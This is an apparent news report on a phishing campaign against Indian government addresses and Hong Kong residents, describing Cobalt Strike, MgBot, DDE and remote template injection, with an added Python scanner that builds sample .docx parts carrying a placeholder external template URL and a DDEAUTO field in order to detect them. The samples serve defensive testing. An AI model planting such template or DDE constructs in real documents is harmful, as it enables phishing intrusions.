A newly discovered cyber attack campaign by a group of threat actors originating from China has been traced to targeting Indian government agencies and Hong Kong residents. The attacks were first observed in the first week of July, at the same time that a controversial law was passed in Hong Kong and India moved to ban 59 mobile applications from China over privacy concerns.
The cybercriminals behind this attack are said to have used a “unique phishing attempt” targeting victims in India and Hong Kong. The group is reported to have leveraged at least three different tactics, techniques, and procedures (TTPs), using spear-phishing emails to deliver various Cobalt Strike variants, the MgBot malware, and fake Android mobile applications in order to acquire call logs, contacts and SMS messages.
The targets of this scheme appear to be the Indian government and individuals in Hong Kong, or at least those who oppose the new security law imposed by China.
The first variant, executed on July 2, informs the victim that their email address has been leaked and that they need to complete a security check on July 5; the alerted recipients have addresses on the “gov.in” domain.
The email attachment, “Mail security check.docx”, which purportedly came from the Indian government’s Information Security Center, employs template injection to download a remote template and execute a variant of Cobalt Strike.
One day after the attack, the threat actors switched from Cobalt Strike to an updated version of the MgBot malware.
In the third version, executed on July 5, the researchers observed the APT using a different document, one stating that UK Prime Minister Boris Johnson had allegedly promised to accept three million Hong Kong residents into the country.
Dynamic Data Exchange (DDE), a protocol that allows data to be communicated or shared between Windows applications, was used to execute the payload encoded inside the documents.
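As an added defender-side example that is not part of the original report, the following Python scans a .docx for the two document-level techniques described above: an attached-template relationship that resolves to an external URL (remote template injection) and DDE field codes. The sample documents are constructed in memory with placeholder hosts and field arguments.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Constructed sample parts, not taken from the campaign: a settings.xml.rels whose
# attachedTemplate relationship resolves to an external URL (remote template
# injection) and a document.xml carrying a DDE field. All values are placeholders.
EXTERNAL_TEMPLATE_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/attachedTemplate" Target="http://placeholder.invalid/t.dotm" '
    'TargetMode="External"/></Relationships>'
)
DDE_DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:instrText> DDEAUTO "C:\\PLACEHOLDER\\app.exe" "topic" '
    '</w:instrText></w:r></w:p></w:body></w:document>'
)

def build_sample_docx(template_rels, document_xml):
    """Assemble a minimal .docx (a zip of OOXML parts) in memory for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document_xml)
        if template_rels is not None:
            z.writestr("word/_rels/settings.xml.rels", template_rels)
    return buf.getvalue()

def scan_docx(data):
    """Return external attached-template targets and the number of DDE fields."""
    findings = {"external_templates": [], "dde_fields": 0}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):  # Word fetches an external template on open
                for rel in ET.fromstring(z.read(name)).iter(REL_NS + "Relationship"):
                    if (rel.get("Type", "").endswith("/attachedTemplate")
                            and rel.get("TargetMode") == "External"):
                        findings["external_templates"].append(rel.get("Target"))
            elif name == "word/document.xml":
                root = ET.fromstring(z.read(name))
                # Field codes sit in w:instrText runs or w:fldSimple instr attributes.
                instrs = [(el.text or "") for el in root.iter(W_NS + "instrText")]
                instrs += [el.get(W_NS + "instr", "") for el in root.iter(W_NS + "fldSimple")]
                findings["dde_fields"] = sum(1 for i in instrs if i.strip().upper().startswith("DDE"))
    return findings
```

Either finding (a remote template target or any DDE field) is reason to quarantine the attachment for analyst review; a local attachedTemplate without TargetMode="External" is normal and is not flagged.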
To detect whether it is being observed in a virtual environment, the malware uses anti-VM detection instructions that return information about the processor, and it checks VMware I/O ports as well. It is also self-modifying, altering its code at runtime.
The final executable malware is “pMsrvd.dll”, which is used to perform the malicious activities and poses as a “Video Team Desktop App.”
This malware is also bundled with a Remote Administration Trojan (RAT), which can establish a connection to a command-and-control (C2) server located in Hong Kong.
This gives the Chinese hackers the ability to capture screenshots and keystrokes, and to manage files and processes.
The researchers also found several malicious Android applications made by the same threat actors, equipped with RAT features that could record audio and screen activity, triangulate the phone’s location, and exfiltrate contacts, call logs, SMS messages and web history.
According to the researchers, this Chinese APT group has been active since 2014. In all of its campaigns, it has used several variants of MgBot to meet specific goals.